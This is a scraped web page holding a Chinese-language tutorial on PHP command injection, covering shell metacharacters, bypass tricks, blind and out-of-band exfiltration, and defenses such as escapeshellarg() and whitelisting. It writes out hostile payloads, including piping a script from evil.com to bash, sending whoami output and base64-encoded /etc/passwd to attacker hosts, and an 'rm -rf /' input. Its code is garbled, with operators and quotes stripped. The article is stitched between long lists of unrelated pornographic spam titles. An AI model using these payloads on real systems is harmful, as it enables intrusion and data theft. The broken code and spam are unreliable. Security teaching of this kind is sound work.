亚洲有码Av一区二区三区_国产高清啪啪免费视频_69色视频国产_国产成人人人爆出白浆_国产精品自在线拍国_一本久久伊人热热精品无码_午夜性刺激在线看免费带字幕_助力高品质欧美狂喷水_亚洲精品日韩无码_精品无码一区二区三区蜜臀_麻豆高清国产AV_熟妇人素无码中文字幕_亚洲a级片在线观看_国产欧美日韩三区_99国产成人高清在线观看

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

PHP命令注入漏洞深度解析:從原理到防御的實(shí)戰(zhàn)指南

PHP命令注入漏洞深度解析:從原理到防御的實(shí)戰(zhàn)指南 1. 項目概述從一次線上故障說起那天晚上我正盯著監(jiān)控面板突然收到一連串告警。一個負(fù)責(zé)處理用戶上傳圖片、生成縮略圖的服務(wù)CPU使用率瞬間飆到100%緊接著服務(wù)器負(fù)載異常大量異常進(jìn)程被創(chuàng)建。登錄服務(wù)器一看好家伙/tmp目錄下塞滿了莫名其妙的文件ps aux里一堆wget和bash進(jìn)程在瘋狂運(yùn)行。根因很快定位到一個陳舊的圖片處理腳本里面有一行刺眼的代碼exec(convert $user_input_path output.jpg)。攻擊者通過上傳功能在文件名里嵌入了命令分隔符把簡單的圖片轉(zhuǎn)換變成了在服務(wù)器上為所欲為的“狂歡”。這就是命令注入一個看似古老卻依然活躍的Web安全漏洞而PHP的exec()、system()等函數(shù)往往是埋下這顆雷的“功臣”。命令注入Command Injection顧名思義就是攻擊者能夠?qū)阂庀到y(tǒng)命令“注入”到原本正常的應(yīng)用程序流程中并使之執(zhí)行。它不同于SQL注入操作數(shù)據(jù)庫命令注入直接威脅的是服務(wù)器操作系統(tǒng)本身危害等級通常是最高的RCE遠(yuǎn)程代碼執(zhí)行。PHP因其在Web開發(fā)中的歷史地位和靈活性大量遺留系統(tǒng)和簡單腳本中廣泛使用了exec()、system()、shell_exec()、passthru()以及反引號來調(diào)用系統(tǒng)命令完成諸如文件處理、系統(tǒng)監(jiān)控、調(diào)用外部工具等任務(wù)。這扇“方便之門”一旦對用戶輸入敞開就等于將服務(wù)器的Shell交給了攻擊者。本文將從一個資深開發(fā)和安全從業(yè)者的角度徹底拆解PHP中命令注入漏洞產(chǎn)生的原理、五花八門的攻擊手法并聚焦于真正可落地的防御方案。我不會只告訴你“要對輸入轉(zhuǎn)義”這種正確的廢話而是會深入PHP和Shell的交互層解釋為什么某些轉(zhuǎn)義會失效分享我在代碼審計和滲透測試中見過的真實(shí)繞過案例以及如何在架構(gòu)設(shè)計層面根本性地規(guī)避此類風(fēng)險。無論你是正在維護(hù)歷史代碼的PHP開發(fā)者還是對Web安全感興趣的學(xué)習(xí)者理解這個漏洞都至關(guān)重要。2. 漏洞原理深度剖析PHP如何與Shell“對話”要防御命令注入首先必須理解漏洞是如何產(chǎn)生的。這需要深入到PHP執(zhí)行系統(tǒng)命令的底層機(jī)制。2.1 exec()等函數(shù)的工作機(jī)制當(dāng)我們調(diào)用exec(“l(fā)s -la /home”)時PHP內(nèi)部發(fā)生了什么PHP進(jìn)程會通過fork()系統(tǒng)調(diào)用創(chuàng)建一個子進(jìn)程然后在這個子進(jìn)程中調(diào)用execve()系列系統(tǒng)調(diào)用啟動一個新的程序——通常是系統(tǒng)的默認(rèn)Shell如/bin/sh或/bin/bash。關(guān)鍵點(diǎn)在于PHP并不是直接執(zhí)行“l(fā)s”這個二進(jìn)制文件而是把整個字符串”ls -la /home”作為參數(shù)傳遞給Shell程序。然后由Shell來負(fù)責(zé)解析這條字符串識別出命令名ls、參數(shù)-la, /home再去PATH環(huán)境變量里找到ls命令的真實(shí)路徑并執(zhí)行。這就引入了最大的風(fēng)險點(diǎn)Shell的元字符Metacharacters。Shell為了完成復(fù)雜功能定義了一系列有特殊意義的字符例如命令分隔符;、、、||、|、\n換行管道和重定向|、、、變量和命令替換$、反引號 、$()通配符*、?、[]如果用戶輸入的數(shù)據(jù)未經(jīng)任何處理就直接拼接進(jìn)傳遞給Shell的字符串中那么輸入里的這些Shell元字符就會被Shell解析從而改變命令的原始意圖。2.2 一個經(jīng)典的漏洞代碼模式讓我們看一段極度危險但曾經(jīng)很常見的代碼?php $target_ip $_GET[‘ip‘]; // 用戶輸入 8.8.8.8; cat /etc/passwd system(“ping -c 4 “ . $target_ip); ?開發(fā)者本意是讓用戶輸入一個IP進(jìn)行ping測試。但當(dāng)攻擊者輸入8.8.8.8; cat /etc/passwd時拼接后的命令變?yōu)閜ing -c 4 8.8.8.8; cat /etc/passwdShell會將其解析為兩條順序執(zhí)行的命令先執(zhí)行ping -c 4 8.8.8.8然后執(zhí)行cat /etc/passwd。服務(wù)器上的敏感文件就這樣被泄露了。注意這里有一個非常重要的細(xì)節(jié)。很多人認(rèn)為用escapeshellarg()或escapeshellcmd()包裹整個命令就安全了這是錯誤的。這兩個函數(shù)用于轉(zhuǎn)義參數(shù)而不是整個命令字符串。如果將整個命令如system(escapeshellcmd(“ping -c 4 “ . $target_ip))對于輸入8.8.8.8; cat /etc/passwd它可能會轉(zhuǎn)義分號但更復(fù)雜的繞過仍然可能存在。安全的做法是僅將用戶輸入作為參數(shù)的一部分并對這個輸入?yún)?shù)進(jìn)行轉(zhuǎn)義。2.3 不僅僅是exec()危險函數(shù)家族exec()是最常見的但PHP中能執(zhí)行系統(tǒng)命令的函數(shù)是一個家族exec(string $command, array $output null, int $return_var null): string|false 執(zhí)行命令可以獲取最后一行輸出和返回值。通常用于不需要直接輸出而是需要處理結(jié)果的情況。system(string $command, int $return_var null): string|false 執(zhí)行命令并直接輸出結(jié)果。更“直給”常用于執(zhí)行簡單的命令。shell_exec(string $command): string|false 執(zhí)行命令并以字符串形式返回全部輸出。反引號是它的語法糖$output ls -la;等價于$output shell_exec(‘ls -la‘);。passthru(string $command, int $return_var null): void 執(zhí)行命令并直接輸出原始二進(jìn)制數(shù)據(jù)如圖像、文件流不進(jìn)行任何緩沖。常用于處理像tar、cat二進(jìn)制文件這樣的命令。popen(string $command, string $mode): resource|false和proc_open() 它們提供了更底層的進(jìn)程控制接口可以打開一個指向進(jìn)程的管道進(jìn)行雙向讀寫。功能強(qiáng)大但若使用不當(dāng)風(fēng)險同樣巨大。這些函數(shù)本質(zhì)上都面臨相同的命令注入風(fēng)險因為它們最終都是通過Shell來解釋命令字符串的。區(qū)別只在于輸出和處理方式漏洞的根源是一致的。3. 攻擊手法實(shí)戰(zhàn)演示攻擊者的“奇技淫巧”理解了原理我們來看看攻擊者在實(shí)際中會如何利用。假設(shè)有一處存在漏洞的代碼system(“nslookup “ . $_GET[‘hostname‘]);。3.1 基礎(chǔ)注入分隔符的妙用這是最直接的方式利用Shell的命令分隔符注入新的命令。分號;example.com; whoami命令變?yōu)閚slookup example.com; whoami。順序執(zhí)行。與example.com cat /etc/passwd命令變?yōu)閚slookup example.com cat /etc/passwd。只有前一條命令成功返回值為0才執(zhí)行后面的。或||example.com || curl evil.com/shell.sh | bash命令變?yōu)閚slookup example.com || curl ...。只有前一條命令失敗才執(zhí)行后面的。攻擊者可能故意輸入一個錯誤的主機(jī)名來觸發(fā)。后臺example.com sleep 10 命令變?yōu)閚slookup example.com sleep 10 。將所有命令放入后臺執(zhí)行可能用于延緩檢測或執(zhí)行耗時任務(wù)。管道|example.com | cat /etc/passwd命令變?yōu)閚slookup example.com | cat /etc/passwd。將前一個命令的輸出作為后一個命令的輸入。這里cat會忽略管道輸入直接輸出文件內(nèi)容。3.2 進(jìn)階繞過當(dāng)輸入被“過濾”時在實(shí)際攻擊中開發(fā)者可能會進(jìn)行一些簡單的過濾比如黑名單過濾;、等字符。這時攻擊者會嘗試?yán)@過。空格繞過很多過濾腳本會檢測空格但Shell中表示空格的方式不止一種。${IFS} IFS是Shell的內(nèi)部字段分隔符默認(rèn)包含空格。cat${IFS}/etc/passwd?;蛑囟ㄏ蚍鹀at/etc/passwd。后面接文件名本身可以替代空格。Tab鍵%09(URL編碼) 在某些上下文中Tab也能作為分隔符。黑名單關(guān)鍵字繞過 如果過濾了cat、ls等命令。使用變量拼接ac;bat;$a$b /etc/passwd。使用通配符/bin/c?t /etc/passwdl*。使用其他命令more、less、head、tail、nl、od等都可以用來讀取文件。使用編碼echo ‘Y2F0IC9ldGMvcGFzc3dk‘ | base64 -d | bashY2F0IC9ldGMvcGFzc3dk是cat /etc/passwd的base64編碼。命令替換與子Shell反引號echo cat /etc/passwd實(shí)際會先執(zhí)行echo cat輸出cat再執(zhí)行cat /etc/passwd這里只是示例原理。$(command) 原理同上更現(xiàn)代的形式。ls $(echo -la)。利用環(huán)境變量和通配符cat $x /etc/passwd如果$x未定義或為空就相當(dāng)于cat /etc/passwd。/???/??t /???/p??s??d這種通配符形式在特定條件下也可能繞過簡單的字符串匹配。3.3 無回顯Blind命令注入與帶外OOB數(shù)據(jù)利用很多時候命令執(zhí)行了但頁面沒有輸出例如exec()只獲取最后一行。攻擊者如何知道命令是否成功并獲取結(jié)果呢時間延遲Time-based Blind 通過注入sleep命令來判斷。example.com sleep 5 如果頁面響應(yīng)延遲了5秒說明注入成功。這可以用于構(gòu)造布爾條件例如example.com test -f /etc/passwd sleep 5如果文件存在就sleep。DNS帶外查詢DNS OOB 這是非常隱蔽有效的一種方式。example.com nslookup $(whoami).attacker-evildomain.com攻擊者控制attacker-evildomain.com的DNS服務(wù)器當(dāng)目標(biāo)服務(wù)器執(zhí)行命令時會嘗試解析當(dāng)前用戶名.attacker-evildomain.com這個域名。攻擊者查看DNS查詢?nèi)罩揪湍芸吹絯hoami命令的輸出結(jié)果被作為子域名帶出來了。HTTP帶外請求HTTP OOB 利用curl或wget將數(shù)據(jù)發(fā)送到攻擊者控制的服務(wù)器。example.com curl http://evil-server/$(cat /etc/passwd | base64)攻擊者在evil-server的Web日志中就能看到被Base64編碼的/etc/passwd文件內(nèi)容。為了避免特殊字符問題通常會對輸出進(jìn)行編碼。實(shí)操心得在滲透測試中遇到疑似盲注點(diǎn)時我首先會嘗試ping -c 1或sleep測試連通性然后立刻嘗試DNS OOB。因為很多服務(wù)器的出站流量限制防火墻可能允許DNS53端口但禁止任意HTTP而DNS請求的隱蔽性也更高。工具如Burp Suite Collaborator或dnslog.cn這類平臺可以自動化地接收和展示這類帶外數(shù)據(jù)極大提高了測試效率。4. 防御策略全景從輸入到架構(gòu)的多層防線防御命令注入絕不能只依賴某一層。我們需要一個縱深防御體系。4.1 第一道防線輸入驗證與白名單這是最根本也最有效的方法。核心思想是定義什么是合法的拒絕一切不符合規(guī)則的數(shù)據(jù)。白名單 vs 黑名單 永遠(yuǎn)優(yōu)先使用白名單。黑名單過濾危險字符注定會失敗因為繞過方式層出不窮。白名單則只允許已知安全的字符通過。如何實(shí)施對于“IP地址”參數(shù)使用正則表達(dá)式嚴(yán)格匹配IPv4/IPv6格式/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/或filter_var($ip, FILTER_VALIDATE_IP)。對于“主機(jī)名”參數(shù)檢查是否只包含字母、數(shù)字、點(diǎn)、連字符/^[a-zA-Z0-9.-]$/。對于“文件名”參數(shù)限制字符集并禁止路徑穿越符..、/、\。使用PHP的filter_var()函數(shù)或ctype_*系列函數(shù)進(jìn)行輔助驗證。$user_ip $_GET[‘ip‘]; if (!filter_var($user_ip, FILTER_VALIDATE_IP)) { die(‘Invalid IP address format.‘); } // 此時$user_ip 在格式上是安全的可以用于拼接 system(“ping -c 4 “ . escapeshellarg($user_ip));4.2 第二道防線安全的命令執(zhí)行與參數(shù)轉(zhuǎn)義當(dāng)必須使用系統(tǒng)命令時必須確保用戶輸入只作為數(shù)據(jù)參數(shù)而不是命令的一部分。使用escapeshellarg()函數(shù)這是最推薦、最安全的方式。它的作用是將一個字符串轉(zhuǎn)義成一個單一的、安全的Shell參數(shù)。它會給字符串加上單引號‘并將字符串中已有的單引號轉(zhuǎn)義為‘\‘‘。$user_input $_GET[‘filename‘]; // 假設(shè)輸入是 file‘; rm -rf / # $safe_argument escapeshellarg($user_input); // 輸出: ‘file‘\‘‘; rm -rf / #‘ system(“cat “ . $safe_argument); // 命令變?yōu)? cat ‘file‘\‘‘; rm -rf / #‘Shell會認(rèn)為$safe_argument是一個完整的參數(shù)值其中的分號、空格、#號都失去了特殊含義。攻擊者注入的命令被安全地“包裹”在一個字符串參數(shù)里。使用escapeshellcmd()函數(shù) 這個函數(shù)會轉(zhuǎn)義Shell元字符#;|*?~^()[]{}$使其失去特殊含義。但要注意它不處理參數(shù)邊界。通常用于轉(zhuǎn)義命令路徑而不是用戶輸入。對于用戶輸入escapeshellarg()是更安全的選擇。// 不安全的用法示例 $cmd “l(fā)s -la “ . escapeshellcmd($_GET[‘dir‘]); // 輸入 .; pwd escapeshellcmd會轉(zhuǎn)義分號變成 ls -la .\; pwd // 這仍然是危險的因為ls會嘗試列出.\和pwd兩個文件/目錄雖然不會執(zhí)行pwd命令但可能引發(fā)其他意外行為或信息泄露。最佳實(shí)踐模式使用數(shù)組參數(shù)形式調(diào)用exec()等函數(shù)PHP 5.3 抱歉這是一個常見的誤解。PHP的exec()、system()等函數(shù)本身不支持像proc_open()或popen()那樣的數(shù)組參數(shù)形式來避免Shell調(diào)用。它們總是通過Shell執(zhí)行的。要避免Shell必須使用proc_open()并設(shè)置bypass_shell選項或者使用pcntl_exec()僅限CLI模式。因此安全拼接的唯一推薦模式是exec(‘固定命令 ‘ . escapeshellarg($user_input1) . ‘ 固定參數(shù) ‘ . escapeshellarg($user_input2))。4.3 第三道防線最小權(quán)限原則與環(huán)境硬化即使代碼有漏洞我們也應(yīng)該限制漏洞被利用后造成的破壞。運(yùn)行在低權(quán)限用戶下 PHP-FPM或Apache的PHP模塊絕不要以root用戶運(yùn)行。應(yīng)該創(chuàng)建一個專用的、低權(quán)限的用戶如www-data、nginx來運(yùn)行Web服務(wù)。這樣即使被注入命令攻擊者也無法直接讀寫關(guān)鍵系統(tǒng)文件、安裝軟件等。配置open_basedir 在php.ini中設(shè)置open_basedir將PHP可訪問的文件限制在網(wǎng)站目錄內(nèi)。這可以防止攻擊者使用cat、file_get_contents()等讀取系統(tǒng)敏感文件如/etc/passwd,/proc/self/environ。禁用危險函數(shù) 在php.ini中通過disable_functions指令直接禁用不必要的命令執(zhí)行函數(shù)。disable_functions exec,system,passthru,shell_exec,popen,proc_open,pcntl_exec,curl_exec,curl_multi_exec,parse_ini_file,show_source,dl,symlink,...注意這可能會影響某些合法功能需要根據(jù)實(shí)際業(yè)務(wù)評估。對于新項目應(yīng)從一開始就避免使用這些函數(shù)。使用safe_mode的替代方案 PHP的safe_mode已被廢棄且效果有限?,F(xiàn)代PHP環(huán)境下應(yīng)通過上述的權(quán)限控制、容器化等方式實(shí)現(xiàn)隔離。4.4 第四道防線架構(gòu)優(yōu)化與替代方案最好的防御是不給攻擊者留下攻擊面。重新思考是否真的需要執(zhí)行系統(tǒng)命令使用PHP原生函數(shù)替代文件操作用scandir()替代lsfile_get_contents()/file_put_contents()替代cat/echocopy()/unlink()替代cp/rm。進(jìn)程信息用getrusage()、sys_getloadavg()替代調(diào)用top、uptime。網(wǎng)絡(luò)操作用gethostbyname()替代nslookup用fsockopen()或curl擴(kuò)展替代wget/telnet。使用經(jīng)過嚴(yán)格審查的第三方庫 例如處理圖片用Intervention Image或Imagine庫而不是調(diào)用外部的ImageMagick命令行。處理壓縮文件用ZipArchive類而不是unzip命令。這些庫通常經(jīng)過了更好的安全審計和輸入處理。將危險操作隊列化與沙盒化隊列化 如果必須執(zhí)行耗時或高風(fēng)險的外部命令如視頻轉(zhuǎn)碼不要在前端Web請求中直接執(zhí)行。應(yīng)該將任務(wù)放入消息隊列如Redis、RabbitMQ由后臺獨(dú)立的、權(quán)限受控的工作進(jìn)程Worker來消費(fèi)和執(zhí)行。這樣可以將執(zhí)行環(huán)境與Web服務(wù)隔離。沙盒化/容器化 對于極度不信任或復(fù)雜的操作可以考慮在Docker容器內(nèi)執(zhí)行。Web應(yīng)用通過API或隊列將任務(wù)和有限的輸入數(shù)據(jù)傳遞給一個一次性任務(wù)容器容器執(zhí)行完畢后即銷毀。這提供了最強(qiáng)的隔離性。5. 實(shí)戰(zhàn)代碼審計與修復(fù)案例讓我們看一個從真實(shí)老舊系統(tǒng)中摘錄的、需要修復(fù)的代碼片段。漏洞代碼示例一個簡單的服務(wù)器監(jiān)控面板// file: admin/stats.php $server $_GET[‘server‘]; // 用戶輸入服務(wù)器IP或主機(jī)名 $metric $_GET[‘metric‘]; // 用戶選擇監(jiān)控項如 ‘cpu‘, ‘disk‘ $command ““; switch ($metric) { case ‘cpu‘: $command “ssh admin$server ‘top -bn1 | grep \Cpu(s)\‘“; break; case ‘disk‘: $command “ssh admin$server ‘df -h‘“; break; default: die(‘Invalid metric.‘); } $output shell_exec($command); echo “pre“ . htmlspecialchars($output) . “/pre“;漏洞分析直接拼接用戶輸入$server 攻擊者可以控制$server變量注入SSH命令。例如server127.0.0.1; whoami;或server127.0.0.1‘ cat /etc/passwd #。使用了shell_exec() 命令通過Shell執(zhí)行所有元字符都會生效。雖然對$metric用了白名單switch-case但對$server毫無防護(hù)。修復(fù)方案修復(fù)的核心思路是1) 對$server進(jìn)行嚴(yán)格的白名單驗證2) 安全地構(gòu)建SSH命令。// file: admin/stats.php (修復(fù)后) $server $_GET[‘server‘]; $metric $_GET[‘metric‘]; // 1. 輸入驗證白名單 $allowed_servers [‘web01.internal.com‘, ‘db01.internal.com‘, ‘192.168.1.10‘]; if (!in_array($server, $allowed_servers)) { die(‘Access denied: Invalid server specified.‘); } $allowed_metrics [‘cpu‘, ‘disk‘]; if (!in_array($metric, $allowed_metrics)) { die(‘Invalid metric.‘); } // 2. 使用SSH密鑰認(rèn)證避免在命令中暴露密碼。這里假設(shè)已配置免密登錄。 // 3. 安全構(gòu)建命令將用戶輸入$server作為ssh命令的參數(shù)并使用escapeshellarg確保其安全。 $ssh_target escapeshellarg($server); $remote_command ““; switch ($metric) { case ‘cpu‘: $remote_command “‘top -bn1 | grep \\“Cpu(s)\\‘“; // 注意遠(yuǎn)程命令內(nèi)的引號轉(zhuǎn)義 break; case ‘disk‘: $remote_command “‘df -h‘“; break; } // 4. 拼接完整命令。$ssh_target 已被escapeshellarg處理是安全的。 $local_command “ssh -o ConnectTimeout5 -o BatchModeyes admin{$ssh_target} {$remote_command}“; // 5. 可選設(shè)置超時和輸出限制 $output shell_exec(“timeout 10s “ . $local_command . “ 21“); if ($output null) { echo “Failed to execute command or command timed out.“; } else { echo “pre“ . htmlspecialchars($output) . “/pre“; }修復(fù)要點(diǎn)解析$allowed_servers白名單 這是最堅固的防線直接限定只能操作預(yù)設(shè)的幾臺服務(wù)器。escapeshellarg($server) 即使白名單被意外繞過或未來動態(tài)添加服務(wù)器這也確保了$server值在本地Shell上下文中被當(dāng)作一個整體參數(shù)防止注入到ssh命令本身。SSH選項-o BatchModeyes強(qiáng)制使用密鑰認(rèn)證避免密碼提示。-o ConnectTimeout5防止因網(wǎng)絡(luò)問題導(dǎo)致進(jìn)程掛起。遠(yuǎn)程命令硬編碼$remote_command是開發(fā)者完全控制的字符串沒有用戶輸入。其中的引號需要小心轉(zhuǎn)義以確保它能在遠(yuǎn)程Shell中被正確解析。本地命令超時 使用timeout 10s包裝整個命令防止惡意命令如sleep 1000長期占用資源。錯誤處理21將標(biāo)準(zhǔn)錯誤重定向到標(biāo)準(zhǔn)輸出便于捕獲錯誤信息。檢查shell_exec的返回值是否為null通常表示執(zhí)行失敗或命令不存在。6. 高級話題與常見誤區(qū)6.1 proc_open() 與 pcntl_exec() 的安全性proc_open() 這個函數(shù)提供了最精細(xì)的進(jìn)程控制。它的一個關(guān)鍵安全優(yōu)勢是可以繞過Shell。通過將$descriptorspec參數(shù)配置好并使用$pipes進(jìn)行通信你可以將命令和參數(shù)以數(shù)組形式傳遞從而避免字符串被Shell解析。$cmd ‘/usr/bin/convert‘; $args [‘input.jpg‘, ‘-resize‘, ‘50%‘, ‘output.jpg‘]; // 用戶輸入需經(jīng)過escapeshellarg處理后再放入數(shù)組 $proc proc_open(array_merge([$cmd], $args), $descriptorspec, $pipes);但是請注意即使使用數(shù)組如果$cmd本身來自用戶輸入比如允許用戶選擇/bin/bash或/usr/bin/python風(fēng)險依然存在。數(shù)組形式只能防止參數(shù)注入不能防止命令替換。$cmd本身必須來自可信源白名單。pcntl_exec() 這個函數(shù)在當(dāng)前進(jìn)程空間內(nèi)直接執(zhí)行指定程序完全不經(jīng)過Shell。這是最安全的方式之一但它有兩個主要限制1) 僅能在CLI命令行模式下使用2) 執(zhí)行后當(dāng)前PHP進(jìn)程會結(jié)束難以獲取輸出。因此它不適合Web場景。6.2 關(guān)于 escapeshellarg 和 escapeshellcmd 的經(jīng)典誤區(qū)網(wǎng)上很多文章會說“用escapeshellcmd()過濾整個命令用escapeshellarg()過濾參數(shù)”。這個說法不準(zhǔn)確且危險。escapeshellcmd($whole_command) 它只會轉(zhuǎn)義命令字符串中出現(xiàn)的Shell元字符。如果用戶輸入是命令的一部分如ping 127.0.0.1; ls轉(zhuǎn)義分號后變成ping 127.0.0.1\; ls這仍然是一個一個命令ping帶著兩個參數(shù)127.0.0.1;和ls。ping命令會嘗試連接主機(jī)名為127.0.0.1;的機(jī)器這通常會導(dǎo)致錯誤雖然不會執(zhí)行l(wèi)s但已經(jīng)改變了命令的語義可能引發(fā)其他問題如錯誤信息泄露、參數(shù)注入到ping命令本身。它不能安全地將用戶輸入隔離為一個參數(shù)。正確的做法永遠(yuǎn)將用戶輸入視為數(shù)據(jù)并使用escapeshellarg()將其轉(zhuǎn)化為一個安全的、被引號包裹的參數(shù)然后再拼接到固定的命令框架中。即safe_command ‘固定命令 ‘ . escapeshellarg($user_input)。6.3 現(xiàn)代PHP框架與依賴包的風(fēng)險即使你使用了Laravel、Symfony等現(xiàn)代框架風(fēng)險依然存在??蚣鼙旧硗ǔ2粫苯右朊钭⑷氲_發(fā)者可能錯誤地使用它們。Artisan 命令 Laravel的Artisan命令可以通過Artisan::call()或\Illuminate\Support\Facades\Artisan調(diào)用。如果用戶輸入直接傳遞給了Artisan命令的參數(shù)而該Artisan命令內(nèi)部又調(diào)用了exec()風(fēng)險鏈就形成了。需要審計自定義Artisan命令的代碼。第三方包Composer 很多包為了便捷會封裝系統(tǒng)命令。例如某些圖片處理包、PDF生成包、備份包等。在引入這些包時需要閱讀其源碼或文檔確認(rèn)其執(zhí)行命令時是否安全地處理了輸入。不要盲目相信“流行就等于安全”。序列化與反序列化漏洞 雖然不直接是命令注入但PHP反序列化漏洞可能導(dǎo)致任意代碼執(zhí)行其結(jié)果與命令注入等同。確保不對不可信的數(shù)據(jù)進(jìn)行unserialize()操作。7. 自動化檢測與滲透測試技巧作為開發(fā)者除了編寫安全代碼也需要具備基礎(chǔ)的漏洞檢測能力。7.1 代碼審計中的快速定位全局搜索危險函數(shù) 在項目目錄下使用grep或IDE的全局搜索查找以下關(guān)鍵詞grep -r “exec\|system\|passthru\|shell_exec\|popen\|proc_open\|pcntl_exec\|“ . --include“*.php“分析用戶輸入流 對于找到的每個危險函數(shù)調(diào)用向上追溯其參數(shù)來源。是否來自$_GET、$_POST、$_REQUEST、$_COOKIE、$_SERVER某些HTTP頭可能不可信是否經(jīng)過了安全的處理檢查過濾邏輯 如果發(fā)現(xiàn)了過濾函數(shù)如str_replace過濾分號思考是否能繞過如使用${IFS}、換行符、編碼等。7.2 簡單的滲透測試驗證在獲得合法授權(quán)的前提下可以對疑似點(diǎn)進(jìn)行測試?;A(chǔ)測試Payload; whoami| whoami whoami|| whoami$(whoami)whoami盲注測試Payload; sleep 5 ping -c 5 127.0.0.1 注意觀察響應(yīng)時間或服務(wù)器負(fù)載 curl http://your-collaborator-domain使用Burp Collaborator或RequestBin nslookup $(whoami).your-collaborator-domain工具輔助Burp Suite 使用Intruder模塊配合包含各種命令分隔符和繞過技巧的Payload字典進(jìn)行Fuzz測試。Commix 一個自動化的命令注入檢測和利用工具可以集成到Burp Suite中。OWASP ZAP 包含基礎(chǔ)的命令注入掃描規(guī)則。注意事項未經(jīng)授權(quán)的滲透測試是非法的。所有安全測試必須在目標(biāo)系統(tǒng)所有者明確授權(quán)、并在隔離的測試環(huán)境中進(jìn)行。在生產(chǎn)環(huán)境進(jìn)行未經(jīng)授權(quán)的測試等同于攻擊行為將承擔(dān)法律責(zé)任。命令注入漏洞的根源在于“信任了不可信的數(shù)據(jù)”。防御它需要開發(fā)者建立起牢固的安全意識所有來自外部的輸入都是惡意的直到被證明是安全的。通過白名單輸入驗證、安全的參數(shù)轉(zhuǎn)義、最小權(quán)限運(yùn)行和架構(gòu)層面的隔離我們可以將這個高危漏洞的風(fēng)險降到最低。在PHP的世界里escapeshellarg()是你最忠實(shí)的朋友而shell_exec()和反引號則是需要被時刻警惕的“危險伙伴”。記住安全不是一個功能而是一個貫穿設(shè)計、開發(fā)、測試、部署全流程的基礎(chǔ)屬性。每一次調(diào)用系統(tǒng)命令前都請多問自己一句“這里的用戶輸入我真的處理好了嗎”
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
色婷婷激情| 欧美色图片欧美色图| 久久久专区| 玖色av| 人妻91少妇| 久久国产乱子伦精品免费女,网站| 亚洲情色欧美| 日本 欧美 国产一区| 亚洲,欧美,春色,另类| 日本丝袜美腿人妻九九| 欧美色图99| 一级婬片120分钟试看| 午夜精品五区| 亚洲熟妇A V黑人| 综合欧美亚洲| 美国黄片aaa| 亚洲一区二区性爱电影| 中文字幕 一区二区 亚洲无码| 亚洲熟妇无码一区二区三区| 97国产|免费| 成人性爱av| 综合国产97| 五月天精品| 国产三级在线现体验区| 色色色综合网| 欧美高清16| 色色色热| 高清无码人妻久久久一区二区三区aⅴ| jizz啪啪| 天天干天天操天天拍| 日本一二三免费久久| 色综合天天| 男人天堂久久日韩| 自拍偷拍亚洲熟女妇人精品| 精品一久久久| 宅男影院久久久,99| 91在线美女| 岛国1区2区3区在线观看| 91久热这里只有精品| 高潮精品| 不卡九肏| 日韩精品中文字幕一| 欧美老妇综合网| 女人与公拘交酡2020视频| 亚洲限制级在线| 欧美性爱第1 页| 欧美专利1区2区3区4区5区免费| 精品九区| 日本精品免费一区二区三区四区| 91嫩草欧美| 亚洲无码超碰免费| 精品综合久久久久久97| 国产三级中文有码在线视频| 亚洲偷拍欧美激情| 一区黄二区黄| 久精品无码av一区二免费国产在线观看| 无卡一区=区| 五月色综合| 精品九九九| 十八禁黄色成人网站观看| 日韩卡一卡二卡三在线| 欧美熟妇精品黑人巨大91| 美女露胸露屁股| 亚洲 一区二区 自拍| 97亚洲在线| 99xav| 夜夜草网站| 久久伊人最新网址视频| 骚日日av| 欧美中字不卡| 日日干夜夜操视频h| 无色无码| A一区片| 日日日日做夜夜夜夜做无码97| 六月丁香网| 一区不卡在线观看av| 婷婷8月天青娱乐| 日日干男人的天堂| 亚州色站 日韩电影| www.色婷婷.com| 裸模AV女优| 精品毛片久久久精品毛片| 国产最火爆久久国产网站网站| 国产9熟妇视频网站| oumeizonghese,www| 亚洲情色第一页| 日韩高潮一区| 久久人妻办公室视频| 93人人操人人| 3p国产欧美99热| 操逼操逼逼操操逼91| 欧美狠狠| 精品国产乱码久久久| 一本久久久精品| 99999国产| 人妻精品一区二区三区| 天天草天天日| AV网站高清无码在线观看| 亚洲精品一区二区三区在线播放| 强奸乱伦αv片| 韩国黄色片精品久久久| 青青青操| 久久亚洲日韩国产欧| 男人的天堂三级| 91情色在线| 国产精品人妻无码久久久互動交流 | 97人人模人人爽人人| 一区二区三区精品黑丝白丝酒店对鸡 | 美女丝袜激情小说| 大香蕉中文201| 一起草三级AV电影在线观看| 韩国三级一线观看久| 在线岛国新天堂8| 色牛牛AV| 毛片17S| 天天综合网入口~91| 国产91丝袜在线播放蜜月| 欧美综合1性辶| 亚洲综合影片| 丁香六月婷| 婷婷亚洲中文字幕在线| 97爱爱影院| 久久9免费视频| 一级做a爰片性色毛片久久| 人人操人人大香蕉| 中文字幕人妻色偷偷久久皮| 人妻熟妇一区二区三区| 久久成人午夜精品影院| 四虎永久在线精品免费网址| 超碰在线综合97| 亚洲精品97| 婷婷激情五月| 精品大全99999| 日韩无码三级影院| 激情露脸爱| 超碰在线一区二区| 久久乐| 青春草莓视频在线观看网址| 五月天黄色激情视频| 91久久18禁| 天美91| 免费看日产一区二区三区| 欧亚日韩三区| 精品人妻1区| 97干com| 伊人天天久久动态图| 日韩素人无码一区二区三区三州| 亚洲成成熟女人综合一区二区| 免费A V在线播放| 人妻激情在线视频| 91精品伊人久久久大香线蕉91| 精品人妻一区二区免费蜜桃| 日本一级特级毛片视频| 99re这里只有精品3| 欧美日韩啪啪电影| 在线观看视频91| 91美女视频| 97精品国产97久久久久久免费| 香蕉综合网| 91大学精品激情戏| 亚洲一区日韩精品中文字幕| 1二区9| 激情网色| 丰满人妻一区二区三区| 一区二区三区免费视频入口| 女同亚洲欧美一二三区久久电影| 91精品老女人| 国产精品毛片| 色妹子A V| 富女玩鸭子一级毛片| 国产精品久久久久久久久久久久久久久| A级毛片在线看免费| 色五月激情AV在线| 色穴精品| 一区二区三区高清天码| 阿姨一区二区免费视频-高清正片西瓜视频下载app-T450AV | 青草精品视频一日本久久久久网站| 婷婷在线精品| 思思热在线视频免费| 91国产伊人大香蕉| 性欧美另类高清| 91丨九色丨国产丨人妻在线| 日本精品加勒比海一区| 成人一区二区三区四区| 99性爱| 97人妻免费中文字幕| 久久一区二区蜜桃| 精品综合久久久久久97| 久久婷婷在线观看视频| 丁香激情五月| 无码视频黄色网战| 日本三级网页| 亚洲日韩视频二区| 色综合av综合久久| 啊啊啊啊啊在线| 日本精品九九九| 91天美| 伊人 俄罗斯 a v| 